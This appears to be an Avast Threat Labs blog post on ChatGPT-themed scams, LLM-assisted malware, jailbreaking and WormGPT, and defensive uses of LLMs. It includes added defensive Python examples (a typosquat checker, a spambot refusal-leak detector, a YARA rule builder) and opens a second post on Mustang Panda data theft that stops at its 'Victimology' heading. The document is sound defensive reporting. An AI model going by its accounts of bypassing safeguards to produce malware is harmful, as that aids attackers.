Unfortunately, attackers leverage ChatGPT’s name for these malicious vectors, with instances observed involving ads on popular platforms such as Facebook. For example, we have observed ads leading to articles and claiming massive income opportunities where all embedded links redirect to a fraudulent investment portal. 

People typically have to register or provide some kind of personal information. This serves as a first filter that weeds out people who are not easily fooled by easy wins, get-rich-quick schemes, and so on.

Once users provide their information, they become susceptible to a variety of malicious actions, such as identity theft, financial fraud, account takeovers, or being lured into further scams. The personal data collected can be misused or sold on the dark web, contributing to a broader ecosystem of cybercrime. Consequently, users who fall victim to malvertising may experience significant financial losses, compromised privacy, and emotional distress. 

The malvertising tactic is a good example of the ever-evolving strategies that cybercriminals employ to exploit trust and credibility. Recognizing such deceptive tactics is the first step towards mitigating the risks posed by these online threats. 

YouTube scams

YouTube, one of the world’s most popular online platforms, has not been spared from cybercrime. We have seen a significant increase in fake videos using prominent figures to trick users into harmful actions. What makes these scams especially insidious is their exploitation of trust, credibility, and human curiosity. 

The strategy often employed here is known as the “Appeal to authority” or “Argument from authority,” where cybercriminals use influential figures to supposedly validate the credibility of their message or investment opportunity. This manipulation can lead to the phishing of personal details, such as banking information, or directly coerce the victim into sending money to the attacker. 

In one particular instance, videos were created featuring Elon Musk to lure unsuspecting users. These videos often capitalize on Musk’s authority and influence in the tech and business world to legitimize the content. As the example below shows, ChatGPT themes are often misused to lure users.

The bad actors behind this case used a recording from an official stream discussing aspects of OpenAI and modified it to scam victims without needing voiceovers or deepfakes. At certain points in the video, a QR code is displayed that ostensibly offers access to exclusive content or rewards. In reality, this QR code redirects users to a scam page. These scam pages often take the form of cryptocurrency scams promising “easy” profits or elaborate phishing attempts that trick users into revealing sensitive information.

The danger of these scams lies not only in the potential financial loss. As with malvertising, stolen personal data can be used for further phishing attacks, account takeover, or impersonation, or sold on the dark web.

Although the use of AI was not necessary in this particular case, with the increasing maturity of AI models like Midjourney, DALL-E, or other purpose-built models, we can only expect the use of artificially created fake images, videos, and audio to increase over time, both in quantity and quality. Tools like this can produce remarkably convincing depictions of events that never actually happened. We are already seeing tools that allow users to quickly generate videos from a text script. It is still quite noticeable that the videos are not real, but that will become less obvious in the future.

Typosquatting

Typosquatting usually involves minor changes in URLs to redirect users to a different website, potentially leading to phishing attacks. Furthermore, typosquatting is also used to encourage users to install applications that seem legitimate but aren’t. An Android app named “Open Chat GBT : AI Chat Bot”, which is shown in the screenshot below, is a prime example of this tactic. This subtle alteration (“GBT” in place of “GPT”) can go unnoticed by users who aren’t paying close attention.
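One way a store reviewer or a user could catch lookalike names such as the one above is an edit-distance check against a short list of protected brand names. This is an added example, not Avast code; the brand list, homoglyph table and sample names are constructed for it, and the distance threshold is an assumption.

```python
"""Flag app or extension names that impersonate a well-known brand.

Added example for this article (not Avast code). The brand list and the
sample names are constructed; "Open Chat GBT : AI Chat Bot" is the name
quoted in the text.
"""
import re

# Brands the check protects (constructed list for this example).
PROTECTED_BRANDS = ("chatgpt", "openai")

# Digit/symbol lookalikes that typosquatters commonly swap in for letters.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t",
                            "@": "a", "$": "s"})


def normalize(name: str) -> str:
    """Lowercase, map homoglyphs to letters and drop everything that is not a
    letter, so "Open Chat GBT : AI Chat Bot" becomes "openchatgbtaichatbot"."""
    name = name.lower().translate(HOMOGLYPHS)
    return re.sub(r"[^a-z]", "", name)


def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, or swap
    two adjacent characters, each counting as one edit."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def closest_brand(name: str, max_distance: int = 1):
    """Slide a window the length of each brand over the normalized name and
    return (brand, distance) for the nearest lookalike, or None.

    An exact brand substring (distance 0) is reported too: a third-party
    extension that merely contains "chatgpt" still needs a publisher check.
    max_distance=1 is an assumed threshold; raising it catches more variants
    but starts to flag unrelated names."""
    text = normalize(name)
    best = None
    for brand in PROTECTED_BRANDS:
        for start in range(0, max(1, len(text) - len(brand) + 1)):
            window = text[start:start + len(brand)]
            dist = damerau_levenshtein(window, brand)
            if dist <= max_distance and (best is None or dist < best[1]):
                best = (brand, dist)
    return best


def is_lookalike(name: str, legitimate_publisher: bool = False) -> bool:
    """True when the name sits within edit distance of a protected brand and
    the publisher is not the brand owner. Names far from every brand pass."""
    return closest_brand(name) is not None and not legitimate_publisher


if __name__ == "__main__":
    # Constructed sample names for this example.
    for sample in ("Open Chat GBT : AI Chat Bot", "ChatGPT",
                   "Ch@tGPT Assistant", "Weather Radar"):
        print(f"{sample!r:32} -> {closest_brand(sample)}")
```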

Browser extensions

Following the introduction and surge in popularity of ChatGPT, we witnessed the emergence of myriad browser extensions. While there are a number of legitimate extensions that have gained popularity, other malicious versions have used that popularity to lure in victims. 

To trick unsuspecting users, attackers create an extension with an enticing title that contains or closely resembles ChatGPT. The attackers leverage this confusion to convince users that the browser extension is genuine when, in reality, it’s a malicious piece of software. These extensions often disseminate adware or stealers/spyware, with some even tricking users into subscribing to services that periodically drain fees from the victim’s credit card (this is also known as fleeceware).

One such case was documented by Guardio, where threat actors copied the design of a legitimate extension called “ChatGPT for Google”. The malicious version of the extension spread by these bad actors steals the Facebook sessions and cookies of its victims.

Image credit: Guardio 

Fortunately, in the case of this malicious extension copycat, Google removed it from the Chrome Web Store shortly after it was reported by Guardio. 

Installers and cracks

When trying to download a popular tool or application that you want to use, it’s not uncommon to come across installers that contain malware. These installers are designed to trick users into installing harmful software on their devices without even realizing it. They often appear to be legitimate installers, using the name and appearance of the real tool or application that you’re interested in. 

We can observe malicious installers like this misusing the name of ChatGPT and promising users that they can install and use ChatGPT on their device. One such example discovered by Meta’s engineering team is NodeStealer, malware that steals passwords and cookies from browsers.

Cracks or unofficial versions of software can be risky, as it’s possible to hide malware inside them. Once installed, the malware may allow hackers to access your personal information, steal your passwords, or even take control of your computer. 

Fake updates

While browsing the web, users might come across an article that appears to be essential to read. But upon clicking the link, a page is displayed claiming that the browser is out of date and needs an update to show the content. One example is a SocGholish campaign where ChatGPT-related articles are, among other topics, misused by attackers to lure people into downloading a browser update which is in fact typically a remote access trojan (RAT) giving the attacker complete control of the infected device. We often see these pages hosted on WordPress sites with vulnerable plugins or sites with weak admin credentials.

AI as a tool for malicious purposes 

Recognizing AI-generated content is harder than you might think

Large language models (LLMs)—the AI tools that power tools like ChatGPT—have been creating a lot of buzz from their beginning. People have been amazed by their capabilities, and they’ve undeniably opened up a wide range of new possibilities. At the same time, LLMs have also brought some troubles. For example, schools have quickly needed to figure out how to approach these newly available tools while effectively communicating their pros and cons to students.  

As a result, the need for a tool able to recognize AI-generated content emerged. We have analyzed a couple of projects that claim to be able to identify such content. Some of them have good results on basic prompts, but each one of them fails once any type of change is introduced. More specifically, generated text that was properly detected as 100% AI-generated was suddenly 100% human once ChatGPT was asked to introduce a couple of mistakes.  

When it comes to detecting AI-generated code or even binaries compiled from AI-generated sources, the problem becomes even trickier. Similar to detecting more traditional malware, this is yet another never-ending cat and mouse game between AI generators and detectors: Once the first detectors started popping up, new generators were created to avoid them. 

LLMs and malware 

Time and time again, it has been proven that LLMs can be used to generate malicious code. However, it should be noted that while LLMs can significantly simplify the process, some degree of understanding of the malware development process is required to get the desired output. There are also many available malware builders, obfuscators, and packers that make the LLM approach comparatively cumbersome: they are tailored to creating malware and have no active protection against malicious inputs.

Our team tested LLMs to generate simple malicious portions of code for testing our products, and in doing so, we’ve put together some key takeaways:

1. Recognizing AI-generated content is hard, and protection techniques (such as packing and obfuscation) make it even harder

As mentioned above, the cat and mouse game between AI generators and detectors continues to play out. Since AI vendors continuously improve their models, detection models can become obsolete quite quickly.  

It is important to mention that LLMs don’t change the behavior of code, just how the code was created. So far, we haven’t seen LLMs come up with a novel, previously unseen technique to infect machines. They can only use an arsenal of already known techniques.

2. Malware authors need to figure out much more than just source code

They need to verify the proper functionality of the code, testing environments, obfuscation, distribution methods, and the infrastructure of the attack vector. What’s more, they’re responsible for preventing takedowns–at the end of the day, it’s the cybercriminals’ intent to have the threat working for the longest possible period of time.

Testing of the generated code is important: our attempts showed a rather high number of cases where the code didn’t work as intended on the first go, and these errors can be hard to notice at first glance.

The task of covering their tracks must also be included in an attacker’s scope of responsibility. This often amounts to money laundering, anonymization, and operational security in general.

3. Creating malware still requires a fair amount of technical knowledge

When it comes to creating prompts for LLM malware, the prompts themselves need to be quite precise–technical knowledge of how to write the code is still needed, although non-sophisticated components can be more straightforward to write. Many real-world examples only showcase short snippets of the malware creation process due to restrictions in both the prompt length as well as the security filters implemented in the LLM systems to avoid misuse for malicious purposes. Because of this, it can still be difficult to make a functional, more complex codebase. As an interesting consequence, a whole new type of job has emerged where creating prompts for the model is the primary activity.

It’s necessary for the attacker to test the results, tweak the queries, and know what the ideal (malicious) solution should look like. It is important to recognize that the attacker must possess knowledge of AV protections, anti-sandbox and anti-debugging tricks, as well as obfuscation techniques to overcome security measures. For these reasons, LLMs aren’t the top choice for the creative work that writing these kinds of malicious code requires.

Spambots, social media, and fake reviews 

The rise of AI technology has inadvertently led to an evolution in spam tactics. Spambots have been observed exploiting OpenAI’s ChatGPT system, which has a filtering mechanism designed to avoid generating offensive or inappropriate responses. 

Instead of generating a substantive response, ChatGPT returns an error message when asked to generate inappropriate content, such as: “As an AI language model, I cannot generate inappropriate or offensive content,” or “I’m sorry, I cannot generate inappropriate or offensive content.” 

In many cases, spambots and fake social media bot accounts inadvertently publish these error messages. This is because spambots (both their algorithms and the people behind them) don’t validate output from ChatGPT—instead, they use the response from ChatGPT directly, resulting in self-incrimination of the bot as these messages can be used as a telltale sign of spambot activity.

Image credit: Twitter 

Interestingly, we have also noticed spambots manipulating user reviews. Some entities copy a response directly from ChatGPT in an attempt to gain positive feedback or inflate product ratings. This highlights the evolving sophistication of spam strategies and the importance of maintaining vigilance in digital interactions.

Image credit: VICE 

Spambots try to systematically flood product listings with deceptive reviews that exaggerate positive aspects, artificially inflate ratings, and create a false perception of popularity and quality. Users rely heavily on reviews to make informed buying choices, and when manipulated by spambots, they may unknowingly purchase subpar products based on misleading information. 

Each of these examples goes to show that ChatGPT is consistently being used for malicious purposes. The quality of the ChatGPT textual outputs as well as its capability to generate many different wordings will make the detection of fake reviews harder for both the e-shops as well as humans. 
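The two spambot artifacts described above, the leaked refusal message and bursts of near-identical reviews, can both be checked mechanically. This is an added example, not Avast code: the refusal patterns extend the two sentences quoted in the text, and the sample posts, reviews and timestamps are constructed; the similarity threshold and time window are assumptions.

```python
"""Spot two artifacts of ChatGPT-driven spam described in the article: posts
that leak the model's refusal message, and bursts of near-identical reviews.

Added example (not Avast code). The sample posts and reviews are constructed;
the two refusal sentences are the ones quoted in the text.
"""
import re
from datetime import datetime, timedelta
from itertools import combinations

# Refusal fragments a spambot pastes verbatim when the model declines a prompt.
REFUSAL_PATTERNS = (
    r"as an ai language model",
    r"i(?:'m| am) sorry,? (?:but )?i (?:cannot|can't) generate",
    r"i (?:cannot|can't) generate inappropriate or offensive content",
)
_REFUSAL_RE = re.compile("|".join(f"({p})" for p in REFUSAL_PATTERNS))


def canonical(text: str) -> str:
    """Lowercase, straighten curly quotes and collapse whitespace so pasted
    model output matches regardless of the platform's typography."""
    text = text.lower().replace("\u2019", "'").replace("\u201c", '"').replace("\u201d", '"')
    return re.sub(r"\s+", " ", text).strip()


def refusal_leak(post: str):
    """Return the leaked refusal fragment found in a post, or None."""
    m = _REFUSAL_RE.search(canonical(post))
    return m.group(0) if m else None


def shingles(text: str, n: int = 3) -> set:
    """Word n-grams; two reviews sharing most of these are near-duplicates."""
    words = re.findall(r"[a-z0-9']+", canonical(text))
    return {" ".join(words[i:i + n]) for i in range(max(0, len(words) - n + 1))}


def jaccard(a: set, b: set) -> float:
    return len(a & b) / len(a | b) if a | b else 0.0


def review_burst_clusters(reviews, window=timedelta(hours=24), threshold=0.5):
    """Group reviews whose text overlaps by at least `threshold` (Jaccard on
    3-word shingles) and that were posted within `window` of each other.
    Returns sorted clusters of review ids with two or more members."""
    sh = {r["id"]: shingles(r["text"]) for r in reviews}
    parent = {r["id"]: r["id"] for r in reviews}   # union-find over review ids

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for a, b in combinations(reviews, 2):
        close_in_time = abs(a["posted"] - b["posted"]) <= window
        if close_in_time and jaccard(sh[a["id"]], sh[b["id"]]) >= threshold:
            parent[find(a["id"])] = find(b["id"])
    groups = {}
    for r in reviews:
        groups.setdefault(find(r["id"]), []).append(r["id"])
    return sorted(sorted(g) for g in groups.values() if len(g) > 1)


# Constructed samples for this example.
SAMPLE_POSTS = [
    "As an AI language model, I cannot generate inappropriate or offensive content.",
    "I\u2019m sorry, I cannot generate inappropriate or offensive content.",
    "Loved the hike today, the trail was finally dry.",
]
T0 = datetime(2023, 6, 1, 9, 0)
SAMPLE_REVIEWS = [
    {"id": "r1", "rating": 5, "posted": T0, "text": "This product exceeded my expectations in every way, highly recommended to everyone!"},
    {"id": "r2", "rating": 5, "posted": T0 + timedelta(minutes=20), "text": "This product exceeded my expectations in every way, highly recommended to all!"},
    {"id": "r3", "rating": 5, "posted": T0 + timedelta(hours=2), "text": "Truly this product exceeded my expectations in every way, highly recommended to everyone."},
    # A reworded copy: same intent, different wording, so shingles no longer overlap.
    {"id": "r4", "rating": 5, "posted": T0 + timedelta(hours=1), "text": "Great buy, it does everything I hoped for and I would order it again."},
    {"id": "r5", "rating": 1, "posted": T0 + timedelta(days=30), "text": "Broke after a week, the charging port came loose."},
    # Identical text, but weeks later: outside the burst window.
    {"id": "r6", "rating": 5, "posted": T0 + timedelta(days=45), "text": "This product exceeded my expectations in every way, highly recommended to everyone!"},
]

if __name__ == "__main__":
    for p in SAMPLE_POSTS:
        print(f"{refusal_leak(p)!r:40} <- {p[:40]}")
    print("bursts:", review_burst_clusters(SAMPLE_REVIEWS))
```

Review r4 in the sample shows the limit the paragraph above points out: a rewording produced by the model shares almost no shingles with the originals and escapes the cluster, so wording similarity alone is a weak signal once variants are cheap.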

Generating other inappropriate results 

ChatGPT has a filtering system in place, but bad actors are still able to find ways around this in order to generate content for malicious purposes. Although it’s possible to get around the tool’s safeguards, this proves to be a time-consuming task for hackers, who can save time simply by searching with a traditional search engine. After all, there is a lot of “educational-use-only” malware on GitHub anyway.

It is possible that tools able to bypass the security filters (a practice also called “jailbreaking”) will make the use of ChatGPT for malicious purposes more convenient. We can already see efforts like WormGPT, which is based on open-source LLM models and trained with malware in mind. Unlike other AI models that have implemented restrictions to combat abuse, WormGPT operates without ethical boundaries, making it more accessible even to novice cybercriminals.

Deepfake

Deepfakes are a concerning and emerging form of technology that can pose serious threats to individuals and society as a whole. As a direct application of AI for malicious purposes, these convincing and highly realistic videos can make it seem like someone said or did something they never actually did. This is done by changing and manipulating the appearance and voice of the individual using AI. 

Deepfakes can have far-reaching consequences, leading to public outrage, damaged reputations, and even social or political instability. Moreover, deepfakes can be used for identity theft or fraud, as scammers can create videos or images that look like someone you know, tricking you into sharing sensitive information or inadvertently sending money to the attacker. 

An example of this was the case of the deepfake video depicting Ukrainian President Volodymyr Zelenskyy that appeared online not long after the onset of the war in Ukraine. This was a highly politically motivated deepfake that surfaced on various social media platforms. 

We’ve also observed attempts to use deepfakes as defense arguments. In this case, a lawsuit was filed against Tesla by a car accident victim’s family who claimed that Tesla’s automated driving software failed, while Tesla supposedly argued that the driver ignored warnings and was playing a video game while driving. The family’s attorneys aimed to depose Musk about his recorded statements from 2016, but Tesla opposed the request by suggesting the Musk statements were deepfakes and that, as a result, he can’t be held responsible. 

In the wild

While LLMs offer immense assistance to individuals seeking help with their everyday struggles, the same goes for the bad actors. Despite the safeguards put in place, we can already see attempts to create proof of concepts using a specific set of prompts, experimenting with the tools to create malware. 

In multiple examples, Check Point Research provides evidence that threat actors are investigating the use of ChatGPT for creating malware. For instance, a user on an underground hacking forum shared their efforts to create a functional information stealer, and claimed they had successfully created multiple strains and techniques from publicly available write-ups. In another attempt, Check Point Research tried to prompt ChatGPT themselves to generate snippets of code which could be used in malware.

Kaspersky, on the other hand, chose a different approach when they used ChatGPT to try to identify phishing based on a URL. Although the LLMs are not mature enough to do this yet, it shows the potential of the technology. With additional training and fine-tuning, it could become a viable detection method.

The attackers don’t hesitate to try new tools, and they will thoroughly test LLMs’ capabilities, including ChatGPT or other emerging models like WormGPT, in attempts to generate code (and text) for malicious purposes. Even though possible, the process of generating malware is still cumbersome, and other development methods, like copying code directly from GitHub or StackOverflow, are still more straightforward and easier.

We experimented with generative AI in our testing environment, aiming to simulate behaviors usually associated with malware. However, we faced similar challenges in the process. Many of our attempts led to a high error rate in the generated code, which demanded expertise in identifying and resolving these errors. Additionally, when a prompt that could potentially be perceived as suspicious was introduced, the security filter was triggered, essentially blocking further prompts. This necessitated initiating an entirely new chat, which significantly reduced the convenience of the overall experience. 

We agree that ChatGPT can save time while producing simpler techniques for the testing environment. It could be utilized by a skilled person to produce better results with the right prompts, but we also expect this person to be well versed in the field, using obfuscation and other protection techniques anyway.

At this point, less savvy users will likely get frustrated in their attempts to generate malware, resulting in copying code from GitHub and StackOverflow anyway, always walking the simplest path. However, when tools without security filtering and restrictions appear, like WormGPT, this might change rather quickly.

How ChatGPT can serve as a tool for helping researchers 

While we’ve explained how LLMs can be used for malicious purposes, they can also be used for good and to support researchers in their work. When using the services of AI tools, it’s important to verify the output and ensure that you’re not using any internal company data. After all, anything that is entered into an AI tool can be used for further training and potentially lead to a leak. Having a third-party agreement or NDA can help combat this risk, but this is definitely not the case with a public service like ChatGPT nor any other tool that is offered for free. 

Supporting analysts in understanding and writing detections 

Security analysts can use ChatGPT to prepare detection rules for them or, alternatively, to explain existing rules when they’re in doubt about what exactly a rule does.

Rules in detection languages that allow researchers to describe patterns (for example, in malware or its behavior), including Yara, Suricata, or Sigma, don’t reach analyst quality when created by LLMs. For junior analysts, however, the provided template can be useful–they can take it as a starting point and improve the detections from that baseline.

Presented below is a pre-formatted Yara rule template. It’s prepared for an analyst to input malicious strings discovered in a Portable Executable (PE) file that’s less than 100 KB. Accompanying explanations are also included. It’s far from perfect, but a junior analyst can proceed from this point and try to further improve the ruleset by submitting additional queries and searching online. 
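The template in the screenshot is an image, so as an added example (not Avast code and not the LLM output shown) here is a small Python helper that renders a rule of the same shape, PE magic plus a size cap plus “any of” the analyst’s strings, and a plain-Python evaluator for the same three conditions. The rule name, the example strings and the sample buffers are constructed; the real engine is yara or yara-python, which the evaluator only imitates.

```python
"""Render the kind of YARA rule template the article describes (a PE file
under 100 KB containing any of the supplied strings) and check the same
conditions on a byte buffer without the yara engine.

Added example for this article, not Avast code. Strings and buffers are
constructed; a real check would run the rendered rule through yara.
"""
from datetime import date

PE_MAGIC = b"MZ"                # what YARA's uint16(0) == 0x5A4D tests


def escape_yara(s: str) -> str:
    """Escape backslashes and double quotes for a YARA text string."""
    return s.replace("\\", "\\\\").replace('"', '\\"')


def build_yara_rule(name: str, strings: list, author: str = "analyst",
                    max_size_kb: int = 100) -> str:
    """Render a YARA rule: PE magic, size cap and 'any of' the given strings.

    Each string becomes $s<i> with the 'ascii wide' modifiers so UTF-16
    copies inside the PE are matched as well."""
    if not strings:
        raise ValueError("a rule needs at least one string")
    lines = [
        f"rule {name}",
        "{",
        "    meta:",
        f'        author = "{author}"',
        f'        date = "{date.today().isoformat()}"',
        f'        description = "PE under {max_size_kb} KB carrying known malicious strings"',
        "    strings:",
    ]
    for i, s in enumerate(strings, 1):
        lines.append(f'        $s{i} = "{escape_yara(s)}" ascii wide')
    lines += [
        "    condition:",
        f"        uint16(0) == 0x5A4D and filesize < {max_size_kb}KB and any of ($s*)",
        "}",
    ]
    return "\n".join(lines)


def evaluate(data: bytes, strings: list, max_size_kb: int = 100) -> bool:
    """Apply the rule's three conditions in plain Python: MZ header, size
    limit, and at least one string present in ASCII or UTF-16LE form."""
    if not data.startswith(PE_MAGIC):
        return False
    if len(data) >= max_size_kb * 1024:
        return False
    return any(s.encode("utf-8") in data or s.encode("utf-16-le") in data
               for s in strings)


# Constructed strings standing in for what an analyst pulls from a sample.
EXAMPLE_STRINGS = ["C:\\Users\\Public\\update.exe", "chatgpt_helper.dll"]


def demo_buffers():
    """Three constructed buffers: a tiny PE-like blob with an ASCII string,
    one with the second string in UTF-16LE, and one lacking the MZ magic."""
    hit_ascii = PE_MAGIC + b"\x00" * 64 + EXAMPLE_STRINGS[0].encode("utf-8") + b"\x00" * 16
    hit_wide = PE_MAGIC + b"\x00" * 64 + EXAMPLE_STRINGS[1].encode("utf-16-le")
    miss_no_magic = b"PK\x03\x04" + EXAMPLE_STRINGS[0].encode("utf-8")
    return hit_ascii, hit_wide, miss_no_magic


if __name__ == "__main__":
    print(build_yara_rule("Suspicious_Small_PE", EXAMPLE_STRINGS))
    for buf in demo_buffers():
        print(evaluate(buf, EXAMPLE_STRINGS))
```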

AI-based assistant tools 

Many new projects are emerging that incorporate LLM-based tools in the form of AI-based assistant tools that can assist users with basic or more complex tasks alongside other tools. In general, AI-based assistants promise to speed up work while the user focuses more on important problem solving, which ultimately delivers efficiency and increased productivity. 

There are AI-based assistant tools for office-style work, such as Microsoft 365 Copilot or Google Duet AI, as well as more technical projects for tech-savvy users. These tools often possess an extensive knowledge base, which means the user gets better suggestions, autocompletion, and instant access to documentation, libraries, and examples.

For malware analysts, AI-based assistants can help with understanding the assembly, the disassembled code, or debugging. They can provide insights into function calls, data structures, and control flow, which saves time and effort in the reverse engineering process. 

It’s important to note that the more specific the field is, the more difficult it may be to create a helpful assistant. This is the case in a specialized field like reverse engineering; in this scenario, the functionalities provided by an AI-based assistant can be limiting. However, we can only expect the AI-based assistants to improve and be incorporated into more tools and applications as time goes on. 

Here’s a non-exhaustive list of some of today’s AI-based assistants and their proposed functions:

  • VulChatGPT: Helps with finding potential vulnerabilities in binaries. 
  • Windbg Copilot: Allows users to use ChatGPT capabilities directly in Windows Debugger. 
  • GitHub Copilot: Suggests code and entire functions in real-time using the OpenAI Codex. 
  • Microsoft Security Copilot: Designed to help defenders by assisting with breach identification, incident response, and understanding collected data. 
  • Google Cloud Security AI Workbench: This specialized LLM introduced by Google is a collection of AI tools that are designed to help with point-in-time incident analysis, threat detection, and analytics. 

We see great potential in AI-based assistant tools, especially once they get fine-tuned and specialized over time. Even though we didn’t study all the aforementioned tools in practice and detail, we were able to test the capabilities of two red-teaming tools, namely PentestGPT and BurpGPT.

PentestGPT provides code snippets/tools syntax that the tester can use and it advises further actions based on the output provided by the tester. We’ve found the maturity of the tool is currently low, discovering many bugs and incompatibilities, and it provides generic suggestions. 

BurpGPT is an extension for Burp Suite which sends the requests/responses to a GPT model for evaluation and gives information about discovered vulnerabilities. While testing the tool and browsing an online service, the extension transmitted data to OpenAI. However, we didn’t receive any results, likely due to the absence of detected vulnerabilities.

With the cloud-based tools, we quickly learned that due to the volume of data being transferred and used in the prompts, the costs of running such tools rendered them too expensive for everyday use, especially given the low quality of outputs. 

Furthermore, the users of AI-based assistant tools should carefully read the terms of use, privacy policies, and/or contracts of the services. For the tools to operate, users have to provide potentially sensitive information, possibly going against their interests or, in case of using the tools in the company environment, against the company security policies.

Explaining the functionality of code 

To better understand and defend against malicious threats, security analysts can use ChatGPT to request an explanation of a specific portion of code. Below, we can see an example–the code provided is that of a malicious SocGholish (FakeUpdate) landing page. When asked for an explanation of the code, ChatGPT was able to provide some insights into the function of the code’s specific fields.

This functionality can be useful both for analysts to learn new things and to point them in the appropriate direction in their studies.  

In a second example, ChatGPT delivered an explanation of a PowerShell script. The query attached to the code snippet was simply “explain”, which proved to be sufficient.

Image credit: Twitter
Image credit: Twitter 

In this scenario, ChatGPT didn’t provide a conclusion about what the script actually does. However, a junior researcher can use this output as a starting point to query for further details of what they don’t know. 

As with many evolving technologies, this approach isn’t bulletproof–while ChatGPT often can point analysts in the right direction, it can also do the complete opposite in certain cases. At the end of the day, analysts should maintain a critical eye of ChatGPT’s output and verify the content.  

It is important to mention that there is a limit to the size of the input, so defenders might need to analyze the code in parts. We can, however, expect this limitation will likely be much less noticeable in the future.

Deobfuscating and beautifying simpler scripts 

When prompted, ChatGPT can try to deobfuscate scripts that analysts provide. It can handle simpler obfuscators and beautify the output, making it more accessible to the analyst. 

For example, below is the deobfuscated script from the FakeUpdate example given in the previous subsection. 

The analyst can already see some artifacts that they might find useful–this can make the analysis much faster.

Pricing and privacy concerns 

There are two important aspects of using large language models: privacy and price. Privacy concerns stem from the fact that many online models use submitted data for further training, which can in some cases lead to internal company data leaks (as was the case with Samsung). For use cases in the security industry, one would often need to submit a part of code or an email for the AI to be able to provide insights. This could also lead to data leaks and isn’t acceptable.

The second concern is price: According to estimates, running ChatGPT can cost the company as much as $700,000 each day. While this cost is likely quite high given the current popularity of LLMs and the resulting high volume of queries and inferences, it shows that running such models in-house to avoid privacy concerns is cost-prohibitive. Running these models requires high-performance graphics cards, which have recently been quite hard to come by and, in turn, significantly more expensive than their regular suggested price. 

Using API access might not be cheap either. While testing several AI assistants, we’ve noticed that especially with larger inputs where additional data is provided (like pentesting assistants), the cost of operation rises very steeply, and the maturity of these tools just doesn’t balance the cost yet.

Looking toward the foreseeable future, we expect to see significant cost reductions once tailor-made hardware has been developed and computational optimizations (like 8-bit matrix multiplication) are implemented to reduce the need for high-performance hardware. 

AI can hallucinate too! 

One big issue that we’ve encountered during our testing is that the models have the tendency to come up with responses that are simply untrue. This phenomenon is called hallucination.  

Take this example: In the following interaction, we asked for a vulnerability assessment. The model correctly identifies the type of vulnerability, but it points to a wrong function that causes it and makes up a couple of vulnerabilities that aren’t there at all. 

The same can be said for code generation–while code may look correct and run successfully, in some cases, it might not provide the correct results. For instance, we asked the model to generate code to pull articles from multiple subsites in WordPress. The model created a code that looked good at first sight and used the correct functions but didn’t work correctly. We only discovered the problems after putting the code into our staging environment and thoroughly testing it. This ended up being quite a tedious and time-consuming task, as finding bugs in somebody else’s code can become much harder than writing the code from the ground up. 

We expect more domain-specific LLMs to pop up in the future aiming at lowering hallucinations / false positives by being specifically trained for a particular use case. 

Staying safe

With the exponential growth of ChatGPT’s popularity, it’s no surprise that malicious actors have capitalized on its name to create scams or started using it with malicious intent in mind. However, there are a few tips to protect yourself and stay safer online:

  • Beware of offers that are too good to be true: If an offer seems too good to be true, it most likely is.  
  • Verify the publisher and reviews: Always check the source and authenticity of the app or extension. Be suspicious of ratings that are only 5-star and 1-star, and of reviews that look alike or are constructed in a similar way within a short period of time.
  • Know the product you want to use: OpenAI offers the basic version of ChatGPT for free (after registration) on the official website. Any offer that contradicts this should be treated with caution. 
  • Avoid cracked software: Cracked or pirated software is a common method used by bad actors to distribute malware. 
  • Report suspicious activity: If you encounter a suspicious ad, application, or browser extension, use the report button to inform the provider. 
  • Keep your software updated: Make sure all your software, including your antivirus, is always up to date. 
  • Trust your cybersecurity provider: Avast is here to protect you no matter what you do online. We’re continuously working with our users to protect them against the latest threats. Report a malicious sample or false positive on our website. 
  • Educate yourself: There are many new articles every day about currently used and emerging cyber threats. 

The rise of AI technologies like ChatGPT has unfortunately brought with it an increase in scams and cybersecurity threats. However, with awareness, vigilance, and the right cybersecurity tools in place, users can protect themselves and continue to enjoy the benefits of these advanced technologies. Stay safe in the digital world! 

The post Insights into the AI-based cyber threat landscape appeared first on Avast Threat Labs.

Hitching a ride with Mustang Panda

2 December 2022 at 04:00

Avast discovered a distribution point where a malware toolset is hosted, but also serves as temporary storage for the gigabytes of data being exfiltrated on a daily basis, including documents, recordings, and webmail dumps including scans of passports from Asian, American and European citizens and diplomats applying for Burmese visas, from Burmese human rights activists and Burmese government institutions.

We recently came across a peculiar sample – a stager we believe is being used by Mustang Panda. The stager led us to the group’s distribution point, where we found malicious toolsets. We have analyzed the malware and were able to see relations between various campaigns that have been described by other cybersecurity firms over the course of the last years. Based on publicly published research and our own investigations, we can say with high confidence that the modus operandi and the malicious toolset show a strong link to a group related to Mustang Panda, which has previously been reported as a Chinese APT group. The group has been known for gathering intelligence on Mongolia, and further Asian countries, and most recently was suspected of targeting European entities.

The distribution point, an FTP server, is also used as a transition point for exfiltrated victim data, before the data is moved to an unknown location. We continue to observe new data being uploaded and moved from the point, meaning the campaign is still active, and has been going on for some time. Gigabytes of data are moved around, and the amount of data indicates severe compromise of many high-profile targets in Myanmar. The data types include various office documents and PDFs, stolen browser profiles, webmail dumps and even sound recordings. Browsing profiles were also extracted which can provide access to other infrastructures, services, and private data of the victims. Most of the stolen data seems to be in Burmese making it challenging to analyze. The sensitive data is mainly being collected from devices used by the Myanmar government, state administration, police, army, significant public organizations, or companies, and includes data related to diplomatic meetings, court hearings, military information, contracts and more.

Disclaimer: We have only seen partial snapshots of the exfiltrated data as they are deleted shortly after being moved from the distribution point, so it should be noted that the information we have on victims may be inaccurate or incomplete. Most of the documents are in Burmese, therefore, a language barrier has also to be taken into account. Finally, due to the limited scope and the sheer volume of the data, some assumptions had to be made during the research process. We have reached out to local CERTs, informing them of our findings.

Victimology

